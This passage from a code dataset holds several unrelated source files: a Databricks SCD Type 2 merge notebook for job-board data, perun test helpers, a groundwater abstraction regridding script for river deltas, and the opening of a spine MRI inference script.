col(\"activities_2_title\").alias(\"Activities2\"),\n col(\"activities_3_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent3\"),\n col(\"activities_3_title\").alias(\"Activities3\"),\n col(\"activities_4_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent4\"),\n col(\"activities_4_title\").alias(\"Activities4\"),\n col(\"activities_5_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent5\"),\n col(\"activities_5_title\").alias(\"Activities5\"),\n col(\"activities_6_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent6\"),\n col(\"activities_6_title\").alias(\"Activities6\"),\n col(\"IngestionDate\")\n )\n)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## SCD Type 2 Setup\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The following commands are used for the initial setup of the delta table\n\n# COMMAND ----------\n\n# DBTITLE 1,Add SCD Type 2 Columns to Delta Table\ndf_activities_noblehire_enriched = (\n df_activities_noblehire_enriched\n .withColumn(\"IsActive\", lit(True))\n .withColumn(\"StartDate\", date_format(current_timestamp(), \"yyyy-MM-dd HH:mm:ss\"))\n .withColumn(\"EndDate\", lit(None).cast(StringType()))\n)\n\n# COMMAND ----------\n\n# DBTITLE 1,Populate Delta Table, if empty\ndf_activities_noblehire_enriched.createOrReplaceTempView(\"Temp_DimActivities\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC INSERT INTO WAREHOUSE.DimActivities (\n# MAGIC ActivitiesId, \n# MAGIC SourceSystem, \n# MAGIC ActivitiesTimePercent0, \n# MAGIC Activities0,\n# MAGIC ActivitiesTimePercent1,\n# MAGIC Activities1, \n# MAGIC ActivitiesTimePercent2,\n# MAGIC Activities2, \n# MAGIC ActivitiesTimePercent3,\n# MAGIC Activities3, \n# MAGIC ActivitiesTimePercent4,\n# MAGIC Activities4, \n# MAGIC ActivitiesTimePercent5,\n# MAGIC Activities5, \n# MAGIC ActivitiesTimePercent6,\n# MAGIC Activities6, \n# MAGIC IngestionDate, \n# MAGIC IsActive, \n# MAGIC StartDate, \n# MAGIC EndDate\n# MAGIC )\n# MAGIC SELECT * FROM Temp_DimActivities\n\n# COMMAND 
----------\n\n# MAGIC %md\n# MAGIC ## SCD Type 2 Logic\n\n# COMMAND ----------\n\n# DBTITLE 1,Create Temp Staging Table\n# Create the Source Data Frame\nsourceDF = df_activities_noblehire_enriched\nsourceDF.display()\nprint(\"Count: {}\".format(sourceDF.count()))\n\n# COMMAND ----------\n\n# DBTITLE 1,Create Delta Table Instance\ndeltaJobActivities = DeltaTable.forPath(spark, \"/mnt/adlslirkov/it-job-boards/Warehouse/DimActivities\")\n\ntargetDF = deltaJobActivities.toDF()\ntargetDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Join source and target\ntargetDF = targetDF.filter(col(\"IsActive\") == True).select(*[c for c in targetDF.columns if c not in [\"IsActive\", \"StartDate\", \"EndDate\"]])\n\n\njoinDF = (\n sourceDF\n .join(\n targetDF, \n (sourceDF.ActivitiesId == targetDF.ActivitiesId),\n# & (targetDF.IsActive == \"true\"),\n \"outer\"\n )\n .select(\n sourceDF[\"*\"],\n targetDF.ActivitiesId.alias(\"target_ActivitiesId\"),\n targetDF.SourceSystem.alias(\"target_SourceSystem\"),\n targetDF.ActivitiesTimePercent0.alias(\"target_ActivitiesTimePercent0\"),\n targetDF.Activities0.alias(\"target_Activities0\"),\n targetDF.ActivitiesTimePercent1.alias(\"target_ActivitiesTimePercent1\"),\n targetDF.Activities1.alias(\"target_Activities1\"),\n targetDF.ActivitiesTimePercent2.alias(\"target_ActivitiesTimePercent2\"),\n targetDF.Activities2.alias(\"target_Activities2\"),\n targetDF.ActivitiesTimePercent3.alias(\"target_ActivitiesTimePercent3\"),\n targetDF.Activities3.alias(\"target_Activities3\"),\n targetDF.ActivitiesTimePercent4.alias(\"target_ActivitiesTimePercent4\"),\n targetDF.Activities4.alias(\"target_Activities4\"),\n targetDF.ActivitiesTimePercent5.alias(\"target_ActivitiesTimePercent5\"),\n targetDF.Activities5.alias(\"target_Activities5\"),\n targetDF.ActivitiesTimePercent6.alias(\"target_ActivitiesTimePercent6\"),\n targetDF.Activities6.alias(\"target_Activities6\"),\n targetDF.IngestionDate.alias(\"target_IngestionDate\")\n )\n)\n\njoinDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Hash source and target columns and compare them\nfilterDF = joinDF.filter(xxhash64(*[c for c in joinDF.columns if c.startswith(\"target\") == False and \"IngestionDate\" not in c]) != xxhash64(*[c for c in joinDF.columns if c.startswith(\"target\") == True and \"IngestionDate\" not in c])).withColumn(\"MergeKey\", col(\"target_ActivitiesId\"))\n\nfilterDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Add MergeKey and set it to null where Id is not null\ndummyDF = filterDF.filter(col(\"target_ActivitiesId\").isNotNull()).withColumn(\"MergeKey\", lit(None))\n\ndummyDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Union DFs\nscdDF = filterDF.union(dummyDF)\n\nscdDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Merge\n(deltaJobActivities.alias(\"target\")\n .merge(\n scdDF.alias(\"source\"),\n \"target.ActivitiesId = source.MergeKey\"\n )\n .whenMatchedUpdate(set = \n {\n \"SourceSystem\": \"'Noblehire.io'\",\n \"IsActive\": \"'False'\", \n \"EndDate\": \"date_format(current_timestamp(), 'yyyy-MM-dd HH:mm:ss')\"\n }\n )\n .whenNotMatchedInsert(\n condition = \"source.ActivitiesId IS NOT NULL\",\n values =\n {\n \"ActivitiesId\": \"source.ActivitiesId\",\n \"SourceSystem\": \"source.SourceSystem\",\n \"ActivitiesTimePercent0\": \"source.ActivitiesTimePercent0\",\n \"Activities0\": \"source.Activities0\",\n \"ActivitiesTimePercent1\": \"source.ActivitiesTimePercent1\",\n \"Activities1\": \"source.Activities1\",\n \"ActivitiesTimePercent2\": \"source.ActivitiesTimePercent2\",\n 
\"Activities2\": \"source.Activities2\",\n \"ActivitiesTimePercent3\": \"source.ActivitiesTimePercent3\",\n \"Activities3\": \"source.Activities3\",\n \"ActivitiesTimePercent4\": \"source.ActivitiesTimePercent4\",\n \"Activities4\": \"source.Activities4\",\n \"ActivitiesTimePercent5\": \"source.ActivitiesTimePercent5\",\n \"Activities5\": \"source.Activities5\",\n \"ActivitiesTimePercent6\": \"source.ActivitiesTimePercent6\",\n \"Activities6\": \"source.Activities6\",\n \"IngestionDate\": \"source.IngestionDate\",\n \"IsActive\": \"'True'\",\n \"StartDate\": \"current_timestamp\",\n \"EndDate\": \"\"\"to_date('9999-12-31 00:00:00.0000', 'MM-dd-yyyy HH:mm:ss')\"\"\"\n }\n )\n .execute()\n)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Data Quality Checks\n\n# COMMAND ----------\n\n# DBTITLE 1,Check Delta Table History\ndeltaJobActivities.history().display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Compare Delta Table records with records in the Source DataFrame\n# Read delta table into DataFrame\ndeltaFinal = DeltaTable.forPath(spark, \"/mnt/adlslirkov/it-job-boards/Warehouse/DimActivities\")\nfinalTargetDF = deltaFinal.toDF()\n\n# Raise error if there are records in the delta table (when filtered to show only active records), which do not exists in the source DataFrame\ntargetExceptSourceCount = finalTargetDF.where(col(\"IsActive\") == True).select(\"ActivitiesId\").exceptAll(sourceDF.select(\"ActivitiesId\")).count()\ntargetEqualsSourceCount = finalTargetDF.where(col(\"IsActive\") == True).count() == sourceDF.count()\n\nif targetExceptSourceCount > 0 or targetEqualsSourceCount == False:\n raise Exception(\"There are records in source, which do not exist in target.\")\n","repo_name":"lyubol/WebScraping","sub_path":"Bulgarian IT Job Boards/Warehouse/DimActivities (SCD2).py","file_name":"DimActivities (SCD2).py","file_ext":"py","file_size_in_byte":8879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"2596178029","text":"import os\nimport shutil\n\nimport perun.logic.store as store\nimport perun.utils.streams as streams\nimport perun.logic.index as index\n\n__author__ = 'Tomas Fiedor'\n\n\ndef profile_filter(generator, rule, return_type='prof'):\n \"\"\"Finds concrete profile by the rule in profile generator.\n\n :param generator generator: stream of profiles as tuple: (name, dict)\n :param str rule: string to search in the name\n :param str return_type: return type of the profile filter (either prof or name)\n :returns kProfile: first profile with name containing the rule\n \"\"\"\n # Loop the generator and test the rule\n for profile in generator:\n if rule in profile[0]:\n if return_type == 'prof':\n return profile[1]\n elif return_type == 'name':\n return profile[0]\n\n\ndef index_filter(file):\n \"\"\"Index filtering function\n\n :param str file: name of the file\n :return: true if the file is not index\n \"\"\"\n return file != '.index'\n\n\ndef populate_repo_with_untracked_profiles(pcs_path, untracked_profiles):\n \"\"\"\n Populates the jobs directory in the repo by untracked profiles\n\n Arguments:\n pcs_path(str): path to PCS\n untracked_profiles(list): list of untracked profiles to be added to repo\n \"\"\"\n jobs_dir = os.path.join(pcs_path, 'jobs')\n for valid_profile in untracked_profiles:\n shutil.copy2(valid_profile, jobs_dir)\n\n\ndef prepare_profile(dest_dir, profile, origin):\n \"\"\"\n Arguments:\n dest_dir(str): destination of the prepared profile\n profile(str): name of the profile that is going to be stored in pending jobs\n origin(str): origin minor version for the given profile\n \"\"\"\n # Copy to jobs and prepare origin for the current version\n shutil.copy2(profile, dest_dir)\n\n # Prepare origin for the current version\n copied_filename = os.path.join(dest_dir, os.path.split(profile)[-1])\n copied_profile = store.load_profile_from_file(copied_filename, is_raw_profile=True)\n copied_profile['origin'] = origin\n streams.store_json(copied_profile.serialize(), copied_filename)\n shutil.copystat(profile, copied_filename)\n return copied_filename\n\n\ndef exists_profile_in_index_such_that(index_handle, pred):\n \"\"\"Helper assert to check, if there exists any profile in index such that pred holds.\n\n Arguments:\n index_handle(file): handle for the index\n pred(lambda): predicate over the index entry\n \"\"\"\n for entry in index.walk_index(index_handle):\n if pred(entry):\n return True\n return False\n\n\ndef open_index(pcs_path, minor_version):\n \"\"\"Helper function for opening handle of the index\n\n This encapsulates obtaining the full path to the given index\n\n Arguments:\n pcs_path(str): path to the pcs\n minor_version(str): sha minor version representation\n \"\"\"\n assert store.is_sha1(minor_version)\n object_dir_path = os.path.join(pcs_path, 'objects')\n\n _, minor_version_index = store.split_object_name(object_dir_path, minor_version)\n return open(minor_version_index, 'rb+')\n\n\ndef count_contents_on_path(path):\n \"\"\"Helper function for counting the contents of the path\n\n Arguments:\n path(str): path to the director which we will list\n\n Returns:\n (int, int): (file number, dir number) on path\n \"\"\"\n file_number = 0\n dir_number = 0\n for _, dirs, files in os.walk(path):\n for __ in files:\n file_number += 1\n for __ in dirs:\n dir_number += 1\n return file_number, dir_number\n\n\ndef compare_results(expected, actual, eps=0.0001):\n \"\"\"Compare two float values with eps tolerance.\n\n Arguments:\n expected(float): the 
expected result value\n actual(float): the actual result value\n eps(float): the tolerance value\n Returns:\n None\n \"\"\"\n assert abs(abs(expected) - abs(actual)) < eps\n\n\ndef generate_models_by_uid(profile, value, uid_sequence, key='model'):\n \"\"\"Provides computed models results for each uid in the specified uid sequence.\n\n Arguments:\n profile(Profile): the whole profile with 'models' results\n value(str): the specification of value of given key for matching models\n uid_sequence(list of str): list of uid values to search for\n key(str): the key for matching models\n Returns:\n generator: stream of lists with models dictionaries according to uid sequence\n \"\"\"\n models = profile['profile']['models']\n for uid in uid_sequence:\n yield [m for m in models if m['uid'] == uid and m[key] == value]","repo_name":"tfiedor/perun","sub_path":"perun/testing/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"24619619517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 11:56:56 2020\n\n@author: engelen\n\"\"\"\n\nfrom delta_aquifer import geometry as gm\nimport xarray as xr\nimport rasterio as rio\nimport geopandas as gpd\nfrom create_inputs import create_geo_inputs as cgi\nfrom shapely.geometry import Polygon\nimport pandas as pd\nfrom imod.prepare import spatial as spat\nfrom imod.prepare import Regridder\nimport imod\nimport numpy as np\n\nimport os\nfrom pkg_resources import resource_filename\n\ndef assign_i_coordinate(da, dim, i_dim):\n \"\"\"Assign dependent index coordinate to keep track of row or column nrs in\n selections\n \n da : DataArray\n \n dim : string\n dimension\n \n i_dim : string\n name of new index coordinate\n \n \"\"\"\n \n i_coord = np.arange(len(da[dim]))\n i_coord = xr.DataArray(i_coord, coords=da[dim].coords)\n coords = {i_dim : i_coord}\n return(da.assign_coords(**coords))\n\ndef calc_ddim(da, dim):\n shifts = {dim : 1}\n ddim = da[dim] - da[dim].shift(**shifts)\n ddim[0] = ddim[1]\n return(ddim)\n\ndef get_gcps_coords(L_a, phi_f):\n r = np.array([0., L_a, L_a, L_a])\n phi = np.array([0., -phi_f/2, 0, phi_f/2])\n return(gm._pol2cart(r, phi))\n\ndef get_targgrid(dcell, L_a, phi_f, da):\n \"\"\"Modified version of the function in gm.get_targgrid\n In this function we compensate for when the regridded DataArrays are larger \n than targgrid calculated by gm.get_targgrid\n \n \"\"\"\n targgrid = {}\n targgrid[\"x\"], targgrid[\"y\"] = gm.get_targgrid(dcell, dcell, \n L_a, phi_f/2)\n \n x_max = np.max([da[\"xt\"].max().values, np.max(targgrid[\"x\"])])\n y_max = np.max([da[\"yt\"].max().values, np.max(targgrid[\"y\"])])\n y_min = np.min([da[\"yt\"].min().values, np.min(targgrid[\"y\"])]) \n \n x_max = gm._round2cell(x_max, dcell) + 0.5*dcell\n x_out = np.arange(0.5 * dcell, x_max+1, dcell)\n y_max = gm._round2cell(y_max, dcell) + 0.5*dcell\n y_min = gm._round2cell(y_min, dcell) - 0.5*dcell\n y_out = np.arange(y_min, y_max+1, dcell)\n return(np.meshgrid(x_out, y_out))\n \n \n\n#%%Path management\n#Path to annual groundwater abstractions data here. 
File too large to incorporate in git repo now\npath_ann_abs = r\"g:\\Global_Data\\PCR-GLOB_output\\2019\\totalGroundwaterAbstraction_annuaTot_output.nc\"\npath_2D_nc = os.path.join(path_ann_abs, \"..\", \"totalGroundwaterAbstraction_{}.nc\")\n\ndatafol = os.path.abspath(resource_filename(\"delta_aquifer\", os.path.join(\"..\", \"data\", \"30_deltas\")))\npath_shp = os.path.join(datafol, \"geometry\", \"delta_points.shp\")\npath_gm = os.path.join(datafol, \"geometry.csv\")\n\nfolder_out = os.path.join(datafol, \"abstractions\")\n\n#%%Options\nsave_2D_nc = False #Save seperate rasters\n\n#%%Constants\ndeg2Rad = np.pi/180.\n\n#%%Read\nprint(\"...reading...\")\nds = xr.open_dataset(path_ann_abs)\npoints = gpd.read_file(path_shp).drop(columns = [\"id\"])\npoints = points[points[\"Type\"] != \"shelf\"]\ngeom = pd.read_csv(path_gm, index_col=0).set_index(\"Delta\")\n\n#%%For easy checking NetCdfs in qgis:\nif save_2D_nc:\n years = ds.time.values.astype('datetime64[Y]').astype(int) + 1970\n \n for i, year in enumerate(years):\n ds.isel(time=i).to_netcdf(path_2D_nc.format(year))\n\n#%%Convert to polygons\ndeltas = points[\"Delta\"].unique()\n\ndf = pd.DataFrame(index = deltas, columns = [\"L_a\", \"phi_f\", \"azi_mid\", \"dist_mid\", \"geometry\"])\n\nfor delta in deltas:\n dist, azi = cgi.get_azi_and_distance(points, delta)\n df.loc[delta, \"L_a\"] = np.average(dist)\n df.loc[delta, \"phi_f\"] = cgi.calculate_phi_f(azi)\n df.loc[delta, \"azi_mid\"] = np.sort(cgi.azi_to_angle(azi))[1]\n df.loc[delta, \"dist_mid\"] = np.sort(dist)[1]\n df.loc[delta, \"geometry\"] = Polygon(cgi.sel_delta(points, delta)[\"geometry\"].values)\n\ngdf = gpd.GeoDataFrame(df, geometry=\"geometry\")\ngdf[\"geometry\"] = gdf[\"geometry\"].convex_hull #Fix polygons if constructed with points in the wrong order\n\n#%%Prepare for iMOD-Python prepare\n#rasterize wants the x dimension to be named \"x\".\nrnm = {\"longitude\" : \"x\", \"latitude\" : \"y\"}\nds = ds.rename(rnm)\n\n#Assign cellwidths so that iMOD-python can interpret the non-equidistant grid\ncoords = {\"dy\" : calc_ddim(ds, \"y\"),\n \"dx\" : calc_ddim(ds, \"x\")}\nds = ds.assign_coords(coords=coords)\n\n#%%Select all deltas with bound boxes to reduce data\nbnds = gdf[\"geometry\"].bounds #long live this attribute\n#Enlarge the bounding box with one cell on each side.\nbnds[\"minx\"] -= np.max(ds.dx).values\nbnds[\"maxx\"] += np.max(ds.dx).values\nbnds[\"miny\"] += np.min(ds.dy).values #dlatitude is negative\nbnds[\"maxy\"] -= np.min(ds.dy).values\n\nvar = \"total_groundwater_abstraction\"\nds[var] = ds[var].fillna(0.0)\nds = ds.assign_coords(time = pd.to_datetime(ds.time.values).year)\n\ndas = dict([(delta, ds[var].sel(x = slice(b[\"minx\"], b[\"maxx\"]),\n y = slice(b[\"maxy\"], b[\"miny\"]))\n ) for delta, b in bnds.iterrows()])\n\n\n#%%Regrid\nprint(\"...regridding...\")\nre_das = {}\n \nfor delta, da in das.items():\n x = np.arange(bnds.loc[delta][\"minx\"], bnds.loc[delta][\"maxx\"], step=0.0083333336)\n y = np.arange(bnds.loc[delta][\"maxy\"], bnds.loc[delta][\"miny\"], step=-0.0083333336)\n like = xr.DataArray(None, coords={\"x\" : x, \"y\" : y}, \n dims=[\"x\", \"y\"])\n \n re_das[delta] = Regridder(method=\"multilinear\").regrid(da, like) #Flux is in m/m2/year, so can use multilinear interpolation\n \n\n#%%Clip shapes (Probably better not to do in a later stage, but useful for testing to see what's going on.)\n#ras_shapes = dict([(\n# delta, spat.rasterize(gdf.loc[[delta]], da.isel(time=-1))\n# ) for delta, da in 
re_das.items()])\n#\n#print(\"...clipping...\")\n#re_das = dict([(delta, da*ras_shapes[delta]) for delta, da in re_das.items()])\n##Cutoff extra borders on the side.\n#re_das = dict([(\n# delta, da.dropna(dim=\"x\", how=\"all\").dropna(dim=\"y\", how=\"all\")\n# ) for delta, da in re_das.items()])\n\n#%%Prepare points for transformation, later to be used as gcps\npoints_trans = points.loc[:, [\"Delta\", \"Type\", \"mid_coast\"]]\npoints_trans[\"x\"] = points.geometry.x\npoints_trans[\"y\"] = points.geometry.y \napexes = points.loc[points[\"Type\"]==\"apex\"].set_index(\"Delta\")\n\nfor delta in deltas:\n apex = apexes.loc[delta].geometry\n points_trans.loc[points_trans[\"Delta\"] == delta, \"x\"] -= apex.x\n points_trans.loc[points_trans[\"Delta\"] == delta, \"y\"] -= apex.y\n\npoints_trans[\"r\"], points_trans[\"phi\"] = gm._cart2pol(points_trans[\"y\"], points_trans[\"x\"])\n\n#%%Transform\nprint(\"...transforming...\")\nmid_coast = points.loc[points[\"mid_coast\"]==1].set_index(\"Delta\")\n\nfor delta, da in re_das.items():\n apex = apexes.loc[delta].geometry\n mid = mid_coast.loc[delta].geometry\n da = da.assign_coords(x = da.x-apex.x, y=da.y-apex.y) #Check if apex is really at y=0...\n r, phi = gm._cart2pol(*np.meshgrid(da.y, da.x))\n r_mid, _ = gm._cart2pol(mid.y-apex.y, mid.x-apex.x)\n \n #Scale r\n r *= df.loc[delta][\"dist_mid\"]/r_mid\n points_trans.loc[points_trans[\"Delta\"] == delta, \"r\"] *= df.loc[delta][\"dist_mid\"]/r_mid\n \n #Rotate delta, so it points northwards\n phi = (phi/deg2Rad-df.loc[delta][\"azi_mid\"])*deg2Rad\n phi_p = points_trans.loc[points_trans[\"Delta\"] == delta, \"phi\"]\n points_trans.loc[points_trans[\"Delta\"] == delta, \"phi\"] = (phi_p/deg2Rad-df.loc[delta][\"azi_mid\"])*deg2Rad\n \n r, phi = [xr.DataArray(\n data = i, coords = {\"x\" : da.x, \"y\": da.y}, dims=[\"x\", \"y\"]\n ) for i in [r, phi]]\n \n xt, yt = gm._pol2cart(r, phi)\n \n da = da.assign_coords(r = r, phi = phi, xt=xt, yt=yt)\n re_das[delta] = da\n\npoints_trans[\"xt\"], points_trans[\"yt\"] = gm._pol2cart(points_trans[\"r\"], points_trans[\"phi\"])\n\n#%%Interpolate to grid created for delta\nprint(\"...interpolating...\")\nmodel_data = {}\n\nfor delta, da in re_das.items():\n dcell = geom.loc[delta, \"dx\"]\n assert(dcell == geom.loc[delta, \"dy\"])\n \n targgrid = {}\n targgrid[\"x\"], targgrid[\"y\"] = get_targgrid(dcell,\n df.loc[delta, \"L_a\"], df.loc[delta, \"phi_f\"],\n da)\n \n poldata = {}\n poldata[\"x\"], poldata[\"y\"] = da.xt.values.T, da.yt.values.T\n for t in da.time.values:\n poldata[str(t)] = da.sel(time=t).values\n nan_idx = np.isnan(poldata[str(t)])\n \n griddata = gm.pol2griddata(poldata, nan_idx, targgrid)\n coords = {\"x\" : griddata[\"x\"][0], \"y\" : griddata[\"y\"][:, 0], \"time\" : da.time}\n \n data = np.stack([griddata[str(t)] for t in da.time.values])\n \n model_data[delta] = xr.DataArray(data=data, \n coords=coords, dims=[\"time\", \"y\", \"x\"])\n\n #Assign coordinates which we use for the control points\n model_data[delta] = assign_i_coordinate(model_data[delta], \"x\", \"ix\")\n model_data[delta] = assign_i_coordinate(model_data[delta], \"y\", \"iy\")\n\n#%%Create ground control points:\nprint(\"...creating gcps...\")\ngcps = {}\n\n#Fix order of coastal points\npoints_trans = points_trans.sort_values([\"Delta\", \"Type\", \"yt\"])\n\nfor delta in deltas:\n x_sel = points_trans.loc[points_trans[\"Delta\"] == delta, \"xt\"]\n y_sel = points_trans.loc[points_trans[\"Delta\"] == delta, \"yt\"]\n x_sel, y_sel = xr.DataArray(x_sel.values, 
dims=\"select\"), xr.DataArray(y_sel.values, dims=\"select\")\n select = model_data[delta].sel(x=x_sel, y=y_sel, method=\"nearest\") #ix and iy are rows and cols for gcp\n xg, yg = get_gcps_coords(df.loc[delta, \"L_a\"], df.loc[delta, \"phi_f\"])\n gcps[delta] = [rio.control.GroundControlPoint(row=r, col=c, x=x, y=-y) for r,c,x,y in zip(select.iy.values, select.ix.values, xg, yg)]\n\n#%%Warp\nprint(\"...warping...\")\nwarp_data = {}\n\nfor delta, da in model_data.items():\n data = model_data[delta].drop(labels=[\"ix\", \"iy\"]).transpose(\"time\", \"y\", \"x\") #imod-python does not want other dimensions\n data = data.assign_coords(y=data.y*-1) #Flip y-coorindates\n dsts = [xr.full_like(data,np.nan).sel(time=t) for t in data.time]\n src_crs = dst_crs = rio.crs.CRS.from_epsg(32630)\n dst_transform = imod.util.transform(dsts[0])\n \n for i, t in enumerate(data.time): \n dsts[i].values, _ = rio.warp.reproject(data.sel(time=t).values, dsts[i].values, src_crs=src_crs, \n dst_crs=dst_crs, dst_transform=dst_transform, gcps=gcps[delta])\n \n warp_data[delta] = xr.concat(dsts, dim=\"time\")\n\n#%%Clip out delta\nprint(\"...clipping...\")\nfor delta, da in warp_data.items():\n dcell = geom.loc[delta, \"dx\"]\n \n targgrid[\"x\"], targgrid[\"y\"] = gm.get_targgrid(dcell, dcell,\n df.loc[delta, \"L_a\"], df.loc[delta, \"phi_f\"]/2)\n coords = {\"x\" : targgrid[\"x\"][0], \"y\" : targgrid[\"y\"][:, 0]}\n like = xr.DataArray(np.ones(targgrid[\"x\"].shape), coords=coords, dims=[\"y\", \"x\"])\n da = da.sortby(da.y) #Ensure y is monotonically increasing\n\n warp_data[delta] = da * like\n warp_data[delta] = warp_data[delta].fillna(0.0)\n\n#%%Save\nprint(\"...saving...\")\nfor delta, da in warp_data.items():\n path_nc = os.path.join(folder_out, \"{}.nc\".format(delta))\n da.to_netcdf(path_nc, unlimited_dims=[\"time\"])\n","repo_name":"JoerivanEngelen/delta_aquifer","sub_path":"create_inputs/groundwater_abstractions.py","file_name":"groundwater_abstractions.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"38563075889","text":"# author: \n# contact: onlydgi@foxmail.com\n# datetime:2020/8/9 下午3:58\n# software: PyCharm\n\"\"\"\n文件说明:run for the testA50\n\"\"\"\nimport json\nimport os\nimport time\nfrom torch import nn\n\n# old_path = os.getcwd()\n# print(old_path)\n# new_path = \"/\".join(old_path.split(\"/\")[:-1])\n# os.chdir(new_path)\n# print(os.getcwd())\n\nfrom dataProcessing.makeSubmitJson import pickeT2fromtestdata\nfrom imgLabelPlot import dicom2array\nfrom imgLabelPlot import dicom_metainfo\n\n#coding=utf-8\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import transforms\n\nfrom fcn import FCN8s,VGGNet\nfrom unet import unet_model, unet_parts\nfrom classi_models.resnet import resnet18,ResNet,BasicBlock\nimport random\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nimport numpy as np\nimport cv2\n\nfrom trian import get_peak_points\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict, OrderedDict\n\nfrom imgLabelPlot import dicom_metainfo, dicom2array\n\nconfig_test = dict()\nconfig_test['showFlag'] = 0\n\n\n# os.environ['CUDA_VISIBLE_DEVICES'] = \"1\"\nconfig_test['tranform'] = 1\nconfig_test['lr'] = 0.000001\nconfig_test['momentum'] = 0.9\nconfig_test['weight_decay'] = 1e-4\nconfig_test['start_epoch'] = 0\nconfig_test['epoch_num'] = 600\nconfig_test['batch_size'] = 16\nconfig_test['save_freq'] = 10\nconfig_test['sigma'] = 5.\n# config_test['root_dir'] = r\"../data/testB50.csv\"\nconfig_test['test_jsondir'] = r\"./tcdata/round2_series_map.json\"\nconfig_test['test_img_dir'] = r\"./tcdata/round2test\"\nconfig_test['checkout'] = r\"UNet_double_PosiLoss_classi_100v20_final_model.ckpt\"\nconfig_test['disc_checkout'] = \"disc_resNet_final0919_model.ckpt\"\nconfig_test['vert_checkout'] = \"vert_resNet_final0919_model.ckpt\"\n # r\"Unet_final_model.ckpt\"\n\n# MedicalDataAugmentationTool-VerSe-master/dataset.py'\n\n\nnormMean = [0.168036]\nnormStd = [0.177935]\nnormTransform = transforms.Normalize(normMean, normStd)\nif config_test['tranform'] == 1:\n submitTestTransform = transforms.Compose([\n transforms.ToTensor()\n # ,normTransform\n ])\nelse:\n submitTestTransform=None\n\n\nclass diffuse2D(object):\n \"\"\"diffuse2D is use the nonlinear anisotropic diffusion filter to keep the edge and brighten img ,remove the noise of img.\n ``num_iter=5, delta_t=1 / 7, kappa=20, option=2``\n\n .. 
note::\n apply this function before ToTensor\n\n Args:\n\n \"\"\"\n\n def __init__(self, num_iter=5, delta_t=1 / 7, kappa=10, option=2):\n self.num_iter = num_iter\n self.delta_t = delta_t\n self.kappa = kappa\n self.option = option\n self.hN = np.array([[0, 1, 0], [0, -1, 0], [0, 0, 0]])\n self.hS = np.array([[0, 0, 0], [0, -1, 0], [0, 1, 0]])\n self.hE = np.array([[0, 0, 0], [0, -1, 1], [0, 0, 0]])\n self.hW = np.array([[0, 0, 0], [1, -1, 0], [0, 0, 0]])\n self.hNE = np.array([[0, 0, 1], [0, -1, 0], [0, 0, 0]])\n self.hSE = np.array([[0, 0, 0], [0, -1, 0], [0, 0, 1]])\n self.hSW = np.array([[0, 0, 0], [0, -1, 0], [1, 0, 0]])\n self.hNW = np.array([[1, 0, 0], [0, -1, 0], [0, 0, 0]])\n\n def fit(self, img):\n\n diff_im = img.copy()\n\n dx = 1;\n dy = 1;\n dd = np.sqrt(2)\n\n for i in range(self.num_iter):\n nablaN = cv2.filter2D(diff_im, -1, self.hN)\n nablaS = cv2.filter2D(diff_im, -1, self.hS)\n nablaW = cv2.filter2D(diff_im, -1, self.hW)\n nablaE = cv2.filter2D(diff_im, -1, self.hE)\n nablaNE = cv2.filter2D(diff_im, -1, self.hNE)\n nablaSE = cv2.filter2D(diff_im, -1, self.hSE)\n nablaSW = cv2.filter2D(diff_im, -1, self.hSW)\n nablaNW = cv2.filter2D(diff_im, -1, self.hNW)\n\n cN = 0;\n cS = 0;\n cW = 0;\n cE = 0;\n cNE = 0;\n cSE = 0;\n cSW = 0;\n cNW = 0\n\n if self.option == 1:\n cN = np.exp(-(nablaN / self.kappa) ** 2)\n cS = np.exp(-(nablaS / self.kappa) ** 2)\n cW = np.exp(-(nablaW / self.kappa) ** 2)\n cE = np.exp(-(nablaE / self.kappa) ** 2)\n cNE = np.exp(-(nablaNE / self.kappa) ** 2)\n cSE = np.exp(-(nablaSE / self.kappa) ** 2)\n cSW = np.exp(-(nablaSW / self.kappa) ** 2)\n cNW = np.exp(-(nablaNW / self.kappa) ** 2)\n elif self.option == 2:\n cN = 1 / (1 + (nablaN / self.kappa) ** 2)\n cS = 1 / (1 + (nablaS / self.kappa) ** 2)\n cW = 1 / (1 + (nablaW / self.kappa) ** 2)\n cE = 1 / (1 + (nablaE / self.kappa) ** 2)\n cNE = 1 / (1 + (nablaNE / self.kappa) ** 2)\n cSE = 1 / (1 + (nablaSE / self.kappa) ** 2)\n cSW = 1 / (1 + (nablaSW / self.kappa) ** 2)\n cNW = 1 / (1 + (nablaNW / self.kappa) ** 2)\n\n diff_im = diff_im + self.delta_t * (\n\n (1 / dy ** 2) * cN * nablaN +\n (1 / dy ** 2) * cS * nablaS +\n (1 / dx ** 2) * cW * nablaW +\n (1 / dx ** 2) * cE * nablaE +\n\n (1 / dd ** 2) * cNE * nablaNE +\n (1 / dd ** 2) * cSE * nablaSE +\n (1 / dd ** 2) * cSW * nablaSW +\n (1 / dd ** 2) * cNW * nablaNW\n )\n return diff_im\n\n def __call__(self, tensors):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n\n Returns:\n Tensor: Normalized 